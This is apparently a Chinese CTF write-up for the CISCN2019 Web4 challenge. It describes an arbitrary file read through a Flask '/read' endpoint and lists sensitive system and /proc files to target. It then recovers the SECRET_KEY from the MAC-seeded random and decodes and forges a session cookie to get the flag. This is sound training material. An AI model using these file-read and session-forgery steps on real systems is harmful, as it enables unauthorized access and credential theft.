[CISCN2019 华东南赛区]Web4

# [CISCN2019 华东南赛区]Web4

0X01前言

  • 敏感文件读取

  • flask session伪造

0x02敏感文件读取

读取常见目录

/etc/passwd  
用来判断读取漏洞的存在
/etc/environment
是环境变量配置文件之一。环境变量可能存在大量目录信息的泄露,甚至可能出现secret key泄露的情况。
/etc/hostname/etc/hostname
表示主机名。
/etc/issue
指明系统版本。
/proc目录
/proc/[pid]查看进程
/proc/self查看当前进程
/proc/self/cmdline当前进程对应的终端命令
/proc/self/pwd程序运行目录
/proc/self/环境变量
/sys/class/net/eth0/address mac地址保存位置

读取/proc/self/cmdline

读取app/app.py文件


# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

0x03flask session伪造

代码逻辑很简单,当session fuck是就能获取flag

伪造session必须得知道SECRET_KEY,uuid.getnode()把用mac地址生成

使用解密脚本

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

python 1.py [seesion]值

解密得到{'username': b'www-data'}

import random
random.seed(2485377863463)
print(str(random.random()*233))

利用任意文件读取获取靶机mac

mac地址 /sys/class/net/eth0/address

mac地址是一串16进制的数值,可以转为10进制,或者0x-------------

解得:

34.6711578158

使用flask session 伪造脚本

https://github.com/noraj/flask-session-cookie-manager

换取seesion值获取flag

posted @ 2021-10-17 12:44  步行街  阅读(194)  评论(0)    收藏  举报